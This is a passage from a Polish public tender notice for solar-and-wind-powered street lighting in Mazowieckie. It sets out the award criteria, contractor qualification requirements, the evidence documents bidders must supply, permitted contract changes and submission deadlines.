zgodnie z zapisami zwartymi we wzorze umowy wraz z dowodem jej opłacenia.3.12.Przedmiot zamówienia będzie realizowany z dofinansowaniem ze środków własnych budżetu Województwa Mazowieckiego w ramach „Mazowiecki Instrument Aktywizacji Sołectw MAZOWSZE 2025” – „Mazowsze dla sołectw 2025” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09330000-1 - Energia słoneczna</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34928500-3 - Oświetleniowy sprzęt uliczny</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">21.1.Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami i ich znaczeniem:<br/>Cena – waga 60 %<br/>Okres gwarancji– waga 40 %<br/><br/>Ocena ofert w zakresie przedstawionych kryteriów zostanie dokonana według następujących zasad:<br/>1)	Przez kryterium Cena (K1) Zamawiający rozumie całkowity koszt realizacji zamówienia. Do oceny Zamawiający przyjmuje cenę brutto wpisaną przez Wykonawcę w formularzu oferty <br/>Punkty będą przyznawane według następujących zasad. <br/>Kryterium Nr 1 (K1) cena - 60 %<br/><br/>Maksymalnie 60 pkt do zdobycia<br/><br/>Zastosowane wzory do obliczenia punktowego <br/><br/> Cena oferty najniższej brutto<br/> Wartość punktowa ( ) x 100 x 60 %<br/> Cena badanej oferty brutto<br/>2)	Przez kryterium okres gwarancji (K2) do oceny Zamawiający przyjmuje okres gwarancji wskazany przez Wykonawcę w formularzu oferty.<br/>Zgodnie z warunkami SWZ minimalny okres gwarancji wynosi minimum 48 miesięcy. Oferty zawierające okres gwarancji krótszy niż 48 miesięcy zostaną odrzucone, gdyż ich treść będzie niezgodna z warunkami zamówienia. Maksymalny okres gwarancji wynosi 60 miesięcy. Oferty zawierające okres gwarancji wynoszący 60 miesięcy lub dłuższy uzyskają maksymalnie 40 punktów. <br/>Okres rękojmi jest równy okresowi gwarancji <br/> Zamawiający przy obliczeniu punktów w tym kryterium przyzna punkty zgodnie z następującymi zasadami:<br/>a)	wskazany w ofercie okres gwarancji 48 miesięcy – 0pkt.<br/>b)	wskazany w ofercie okres gwarancji 54 miesiące –20 pkt<br/>c)	wskazany w ofercie okres gwarancji 60 miesięcy i więcej – 40 pkt<br/>Oferta w kryterium okres gwarancji może otrzymać maksymalnie 40 punktów.<br/>W przypadku gdy Wykonawca nie wskaże w ofercie okresu gwarancji to Zamawiający do celu oceny ofert przyjmie okres 48 miesięcy (0 pkt.), taka sytuacja nie spowoduje odrzucenia oferty<br/>21.3. Wynik<br/>Oferta, która przedstawia najkorzystniejszy bilans (maksymalna liczba przyznanych punktów w oparciu o ustalone kryteria) zostanie uznana za najkorzystniejszą, pozostałe oferty zostaną sklasyfikowane zgodnie z ilością uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, który uzyska najwyższą ilość punktów. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. <br/>Ostateczna punktacja oferty powstaje poprzez zsumowanie ilości uzyskanych punktów.<br/>Ocena oferty = K1 + K2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 10.1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 112 ust. 2 ustawy Pzp dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w tym zakresie<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów; <br/>Zamawiający nie określa warunku w tym zakresie<br/>3)	sytuacji ekonomicznej lub finansowej: <br/>Zamawiający nie określa warunku w tym zakresie<br/>4)	zdolności technicznej lub zawodowej;<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>a)	w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, co najmniej: <br/>-jedną robotę budowlaną polegająca na budowie lub przebudowie lub rozbudowie oświetlenia ulicznego o wartości minimum 100 000,00zł. brutto (słownie: sto tysięcy złotych).<br/>W przypadku, gdy ww. zakres robót budowlanych będzie stanowił część robót o szerszym zakresie wykonawca zobowiązany jest wyodrębnić rodzajowo roboty budowlane niezbędne do wykazania spełniania w/w warunku.<br/><br/>Uwaga 1. Za wykonaną robotę budowlaną Zamawiający rozumie taką robotę, która została zrealizowana w ramach jednej umowy i odebrana przez Zamawiającego. <br/> Uwaga 2. Mając na uwadze art. 117 ust. 1 Pzp. Zamawiający zastrzega, że w sytuacji składania oferty przez dwa lub więcej podmiotów (Wykonawcy wspólnie ubiegający się o udzielenie zamówienia) oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 Pzp, warunek, o którym mowa wyżej musi zostać spełniony w całości przez Wykonawcę, jednego z wykonawców wspólnie składającego ofertę lub podmiot, na którego zdolności w tym zakresie powołuje się Wykonawca- Zamawiający nie dopuszcza możliwości tzw. sumowania doświadczenia.<br/>Uwaga 3. Wykonawca, który nabył doświadczenie będąc członkiem konsorcjum w uprzednio wykonanym zamówieniu, może posłużyć się nabytym doświadczeniem wyłącznie w przypadku, kiedy dane roboty budowlane wykonał osobiście<br/>b)	dysponuje osobami zdolnymi do wykonania zamówienia tj.:<br/>- Wymaga się objęcia funkcji Kierownika budowy przez osobę posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń wydane na podstawie obecnie obowiązujących przepisów prawa lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa lub kwalifikacje równoważne do w/w, zdobyte w innych państwach na zasadach określonych w art. 12a Ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j.Dz. U. z 2024 r. poz. 725 z późn. zm.) oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2023 r. poz. 334).<br/>10.2Wykonawca składający ofertę musi wykazać się całym wymaganym doświadczeniem, a w przypadku oferty złożonej przez konsorcjum jeden z uczestników konsorcjum musi wykazać się całym wymaganym doświadczeniem (warunek nie będzie spełniony, jeżeli wszyscy uczestnicy konsorcjum w sumie wykażą się wymaganym doświadczeniem, ale żaden z nich indywidualnie nie wykaże się całym wymaganym doświadczeniem) – dotyczy pkt. 10.1 4)a). Jeżeli Wykonawca w celu potwierdzenia spełniania niniejszego warunku udziału w postępowaniu polegać będzie na doświadczeniu innego podmiotu, musi on wykazać się całym wymaganym doświadczeniem - dotyczy pkt. 10.1. 4)a). <br/>10.3 Oceniając zdolność techniczną lub zawodową, zamawiający może, na każdym etapie postępowania uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/> W przypadku o którym mowa w zadaniu drugim niniejszego punktu, wykonawcy wspólnie ubiegający się o udzielenie zamówienia, dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy.<br/><br/>10.4 W przypadku, gdy złożone przez Wykonawcę dokumenty, oświadczenia dotyczące warunków udziału w postępowaniu zawierają dane/informacje w innych walutach niż złoty polski Zamawiający, jako kurs przeliczeniowy waluty przyjmie kurs NBP z dnia publikacji ogłoszenia o zamówieniu w BZP. Jeżeli w dniu publikacji ogłoszenia nie będzie publikowany średni kurs walut przez NBP, Zamawiający przyjmie kurs przeliczeniowy z ostatniej opublikowanej tabeli kursów NBP przed dniem publikacji ogłoszenia o zamówieniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2023 r. poz. 1689z późn. zm.) z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. (Załącznik nr 9 do SWZ).<br/>2)	Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji<br/>12.2.2.Dokumenty składane przez wykonawcę mającego siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba poza granicami Rzeczpospolitej Polskiej określa § 4 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415 i Dz. U. z 2023 r. poz. 1824).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">3)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty (Załącznik nr 4 do SWZ)<br/>4)	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności wraz z informacją o podstawie do dysponowania tymi osobami(Załącznik nr 5 do SWZ).<br/>12.2.2.Dokumenty składane przez wykonawcę mającego siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba poza granicami Rzeczpospolitej Polskiej określa § 4 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415 i Dz. U. z 2023 r. poz. 1824).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> c) Zamawiający żąda, a Wykonawca zobowiązany jest do złożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/> 1. dot. oprawy solarnej:<br/>1)	certyfikaty CE na oprawy i na turbiny- deklaracje zgodności oprawy,<br/>2)	karta katalogowa oprawy solarnej i turbiny wiatrowej wystawione przez producenta,<br/>3)	oświadczenie lub specyfikacja techniczna producenta oprawy potwierdzająca rodzaj, pojemność oraz napięcie baterii,<br/>4)	informacje o masie oprawy, turbiny oraz paneli,<br/>5)	pliki fotometryczne w formacie IES lub LDT, które będzie można otworzyć w ogólnodostępnych programach Dialux lub Relux,<br/>2.	dot. instalacji -montażu oprawy LED oraz turbiny wiatrowej:<br/>1)	rysunek techniczny konstrukcji mocowania paneli PV oraz wysięgnika, trubiny i oprawy, potwierdzający spełnienie wszystkich warunków dot. stelaża panelu/uchwytu,<br/>2)	deklaracja zgodności stelaża, wysięgnika, trubiny i oprawy,<br/>3)	analiza odporności konstrukcji na obciążenia w odniesieniu do lokalnej strefy wiatrowej oraz obliczenia statyczno-wytrzymałościowe stelaża, wysięgnika, trubiny oraz oprawy,<br/>3.	dot. słupa:<br/>1)	certyfikat stałości właściwości użytkowych potwierdzający spełnienie wymagania normy PN-EN 40-5)<br/>2)	deklaracje właściwości użytkowych dla konkretnego zestawu słupa oświetleniowego wraz z dedykowanym wysięgnikiem potwierdzające spełnienie wymagania normy PN-EN-40-5,<br/>3)	Rysunek techniczny<br/>4)	Oświadczenie producenta słupów wskazujące, iż może być on przeznaczony do montażu na nim opraw solarnych z panelem PV, stelażem, wysięgnikiem, trubiną wiatrową wraz z elementem montażowym, a także wskazujące na maksymalne, dopuszczalne obciążenie słupa masą oraz powierzchnią wiatrową,<br/>4.	dot. fundamentu <br/>1)	certyfikat zakładowej kontroli produkcji<br/>2)	deklaracja zgodności i właściwości użytkowych,<br/>3)	karta katalogowa producenta fundamentów.<br/>Wyżej wymienione dokumenty należy złożyć w języku polskim lub w języku obcym z tłumaczeniem, pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem za¬ufanym, elektronicznym podpisem osobistym lub kwalifikowanym.<br/>Z przedłożonych przez Wykonawcę dokumentów musi jednoznacznie wynikać, że oferowany przedmiot zamówienia spełnia określone przez Zamawiającego wymagania <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> c) Zamawiający żąda, a Wykonawca zobowiązany jest do złożenia wraz z ofertą następujących przedmiotowych środków dowodowych:<br/> 1. dot. oprawy solarnej:<br/>1)	certyfikaty CE na oprawy i na turbiny- deklaracje zgodności oprawy,<br/>2)	karta katalogowa oprawy solarnej i turbiny wiatrowej wystawione przez producenta,<br/>3)	oświadczenie lub specyfikacja techniczna producenta oprawy potwierdzająca rodzaj, pojemność oraz napięcie baterii,<br/>4)	informacje o masie oprawy, turbiny oraz paneli,<br/>5)	pliki fotometryczne w formacie IES lub LDT, które będzie można otworzyć w ogólnodostępnych programach Dialux lub Relux,<br/>2.	dot. instalacji -montażu oprawy LED oraz turbiny wiatrowej:<br/>1)	rysunek techniczny konstrukcji mocowania paneli PV oraz wysięgnika, trubiny i oprawy, potwierdzający spełnienie wszystkich warunków dot. stelaża panelu/uchwytu,<br/>2)	deklaracja zgodności stelaża, wysięgnika, trubiny i oprawy,<br/>3)	analiza odporności konstrukcji na obciążenia w odniesieniu do lokalnej strefy wiatrowej oraz obliczenia statyczno-wytrzymałościowe stelaża, wysięgnika, trubiny oraz oprawy,<br/>3.	dot. słupa:<br/>1)	certyfikat stałości właściwości użytkowych potwierdzający spełnienie wymagania normy PN-EN 40-5)<br/>2)	deklaracje właściwości użytkowych dla konkretnego zestawu słupa oświetleniowego wraz z dedykowanym wysięgnikiem potwierdzające spełnienie wymagania normy PN-EN-40-5,<br/>3)	Rysunek techniczny<br/>4)	Oświadczenie producenta słupów wskazujące, iż może być on przeznaczony do montażu na nim opraw solarnych z panelem PV, stelażem, wysięgnikiem, trubiną wiatrową wraz z elementem montażowym, a także wskazujące na maksymalne, dopuszczalne obciążenie słupa masą oraz powierzchnią wiatrową,<br/>4.	dot. fundamentu <br/>1)	certyfikat zakładowej kontroli produkcji<br/>2)	deklaracja zgodności i właściwości użytkowych,<br/>3)	karta katalogowa producenta fundamentów.<br/>Wyżej wymienione dokumenty należy złożyć w języku polskim lub w języku obcym z tłumaczeniem, pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem za¬ufanym, elektronicznym podpisem osobistym lub kwalifikowanym.<br/>Z przedłożonych przez Wykonawcę dokumentów musi jednoznacznie wynikać, że oferowany przedmiot zamówienia spełnia określone przez Zamawiającego wymagania <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Pełnomocnictwo osoby lub osób podpisujących ofertę – jeżeli uprawnienie do podpisu nie wynika z wpisu do CEiDG lub KRS <br/>Dokument pełnomocnictwa obejmujący swym zakresem umocowanie do reprezentowania w postępowaniu w tym do złożenia oferty lub złożenia oferty i podpisania umowy należy dołączyć do oferty. Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania<br/>2)	W przypadku złożenia oferty wspólnej – pełnomocnictwo udzielone liderowi<br/>3)	Zobowiązanie podmiotu udostępniającego zasoby – załącznik nr 6 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów na podstawie art. 118 ust. 3Pzp – jeżeli dotyczy<br/>Wymagana forma <br/>Dokument musi być złożony w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym osoby upoważnionej do reprezentowania podmiotu udostępniającego zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. <br/>5)	Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy) – w sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, wykonawca, wraz z przekazaniem takich informacji, zastrzega że nie mogą być one udostępniane oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. Dokument należy złożyć w osobnym pliku dołączonym do oferty z jednoczesnym zaznaczeniem„ Załącznik stanowiący tajemnicę przedsiębiorstwa”<br/>Wymagana forma <br/>Dokument musi być złożony w formie elektronicznej lub w postaci elektronicznej opatrzonej, podpisem zaufanym lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie.<br/>26)	przedłożenia kosztorysu ofertowego na 2 dni przed podpisaniem umowy<br/>3.11.Dostarczenie Zamawiającemu przed wyznaczonym terminem podpisania umowy, ale przed podpisaniem umowy aktualnej polisy OC zgodnie z zapisami zwartymi we wzorze umowy wraz z dowodem jej opłacenia <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 9.4.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>a)	Wykonawcy występujący wspólnie o udzielenie zamówienia są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,<br/>b)	wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem,<br/>c)	przepisy dotyczące Wykonawców stosuje się odpowiednio do Wykonawców ubiegających się wspólnie o udzielenie zamówienia,<br/>d)	jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zostanie wybrana Zamawiający może przed zawarciem umowy w sprawie zamówienia publicznego wezwać do przedstawienia umowy regulującej współpracę tych Wykonawców,<br/>e)	w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy,<br/>f)	oświadczenie, o spełnieniu warunków udziału w postępowaniu składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego w zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu lub pełnomocnik w imieniu każdego z wykonawców odrębnie,<br/>g)	oświadczenie o braku podstaw wykluczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego lub pełnomocnik w imieniu każdego z wykonawców odrębnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza zmianę umowy w formie aneksu, w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. Zmiana wymaga zgłoszenia w formie pisemnej informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana i nie spowoduje zmiany wynagrodzenia ani terminu wykonania umowy. Inicjatorem tej zmiany może być Zamawiający lub Wykonawca.<br/>2.	Zamawiający dopuszcza zmianę kierownika budowy oraz innych osób biorących po stronie Wykonawcy udział w realizacji przedmiotu umowy, w sytuacji zdarzeń losowych oraz w przypadku niewywiązywania się z pełnionych obowiązków. Inicjatorem zmiany może być Zamawiający i Wykonawca. Zmiana musi nastąpić na osoby, które spełniają warunki określone w SWZ. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 3 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiany te nie wpłyną na termin wykonania prac i nie spowodują zmiany wynagrodzenia Wykonawcy.<br/>3. Zamawiający dopuszcza zmianę w zakresie dotyczącym zmiany wynagrodzenia w przypadku ustawowej zmiany stawki podatku VAT; Wynagrodzenie należne Wykonawcy zostanie odpowiednio zmienione w stosunku wynikającym ze zmienionej stawki podatku od towarów i usług (VAT).<br/>4.	Zamawiający, po wyrażeniu zgody, dopuszcza zmianę umowy w formie aneksu w przypadku: <br/>1)	wystąpienia siły wyższej np.: trąby powietrznej, pożaru, powodzi, klęski żywiołowej itp. o czas działania siły wyższej;<br/>2)	wstrzymania budowy przez właściwy organ z przyczyn nie zawinionych przez Wykonawcę robót budowlanych, o czas wstrzymania budowy przez właściwy organ;<br/>3)	ujawnienia wad dokumentacji uniemożliwiających prawidłowe wykonywanie robót – o czas potrzebny do usunięcia błędów lub naniesienia poprawek przez projektanta w dokumentacji projektowej lub dokumentacji technicznej;<br/>4)	wystąpienia innych nieprzewidzianych i uzasadnionych okoliczności niezależnych od Zamawiającego i Wykonawcy o czas ich trwania.<br/>5.	Inicjatorem zmiany może być Wykonawca lub Zamawiający. Zmiana wymaga zgłoszenia w formie pisemnej niezwłocznie od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. <br/>6.	Zamawiający dopuszcza zmianę jakości lub innych parametrów charakterystycznych dla danego elementu robót budowlanych lub zmianę technologii ze względu na zmianę postępu technologicznego (np. wycofanie produktu z rynku) w uzgodnieniu z Zamawiającym i dla niego korzystnych, w sytuacjach nie zawinionych przez Wykonawcę. Zmiany te nie wpłyną na termin wykonania prac i nie spowodują zmiany wynagrodzenia Wykonawcy.<br/>7.	Zamawiający dopuszcza zmianę podwykonawcy. Zmiana ta nie wpłynie na termin wykonania prac i nie spowoduje zmiany wynagrodzenia Wykonawcy. Zmiana wymaga zgłoszenia w formie pisemnej niezwłocznie od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Inicjatorem zmiany może być Wykonawca <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-25 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">18.1.Ofertę wraz z wymaganymi załącznikami należy złożyć za pośrednictwem Platformy e-Zamówienia w zakładce „Oferty/wnioski”, widocznej w podglądzie przedmiotowego postępowania po zalogowaniu się na konto Wykonawcy na Platformie.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-25 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający stosowanie do art. 95 ust. 1 ustawy Pzp wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez Zamawiającego poniżej czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności polega na wykonaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (t.j. Dz. U. z 2024r. poz. 1965).<br/>Rodzaj czynności związanych z realizacją zamówienia, których dotyczą wymagania zatrudnienia na podstawie stosunku pracy przez Wykonawcę lub podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia t.j. pracownicy fizyczni wykonujący:<br/>−	roboty w zakresie przygotowania terenu pod budowę i roboty ziemne, roboty przygotowawcze inne czynności (prace fizyczne) związane z wykonaniem bezpośrednio robót objętych przedmiotem zamówienia (kierowcy, operatorzy maszyn wykorzystywanych do realizacji przedmiotu umowy)<br/>Wymóg nie dotyczy czynności wykonywanych przez osoby kierujące budową: kierownika budowy, kierownika robót oraz innych osób pełniących samodzielne funkcje techniczne w budownictwie; dostawców materiałów budowlanych.<br/>Zamawiający wymaga, aby Wykonawca lub podwykonawca zatrudnił w/w osoby przez cały okres realizacji przedmiotu zamówienia tj. od rozpoczęcia do końca upływu terminu realizacji zamówienia; w przypadku rozwiązania stosunku pracy przez pracownika lub przez pracodawcę przed zakończeniem tego okresu Wykonawca zobowiązany jest do zatrudnienia na to miejsce innej osoby.<br/>Wykonawca lub podwykonawca zobowiązany jest przedstawić dokumenty potwierdzające zatrudnienie osób wykonujących czynności, o których mowa powyżej. Wykonawca na każde wezwanie Zamawiającego w terminie wskazanym przez Zamawiającego, nie 